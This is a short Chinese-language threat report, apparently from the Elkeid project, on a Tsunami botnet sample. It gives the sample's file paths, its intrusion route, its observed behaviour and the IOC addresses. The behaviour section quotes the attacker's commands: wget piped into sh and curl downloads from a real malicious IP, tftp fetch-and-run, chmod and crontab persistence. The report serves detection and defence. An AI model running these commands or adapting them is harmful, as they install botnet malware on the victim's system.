报告信息
简述
该样本为tsunami 族内样本,属于僵尸网络类型的样本
样本类型
僵尸网络
elkeid 样本ID
elkeid_20221208_botnet_6
关键词
tsunami,irq,tty,tsh,3sh,x001804289383
捕获时间
20221208
最近活跃时间
20221208
已知入侵途径
- 弱口令爆破
涉及样本
- /tmp/irq0(irq1,irq2)
- /tmp/pty
- /tmp/tty0(tty1...tty6)
- /tmp/1sh(2sh,3sh,tsg)
主要行为
-
下载
- bash -c wget -qO - http://113.106.167.11/x/2sh | sh > /dev/null 2>&1 &
- curl http://113.106.167.11/x/tty2 -o /tmp/tty2
- curl http://113.106.167.11/x/pty -o pty
-
赋权
- chmod 777 /tmp/irq1
- chmod +x /tmp/tty6
- ...
-
执行
- sh /var/run/1sh &
- tftp -g 127.0.0.1 -r tsh ; sh tsh
- /bin/sh ./irq1
- crontab /var/run/.x001804289383
-
扫描
- ip -4 addr change 172.9.58.46/255.255.0.0 broadcast 172.9.255.255 valid_lft 1800 preferred_lft 1800 dev ens3 label ens3
IOC
- 113.106.167.11
- 83.252.207.213
参考链接
- tsunami.elf
https://threatfox.abuse.ch/browse/malware/elf.tsunami/
- 113.106.167.11
https://www.virustotal.com/gui/url/9feeefbeb83e31d62a1da584db2a42d6a74ad4627bcfdca7fc1e54d3eb405021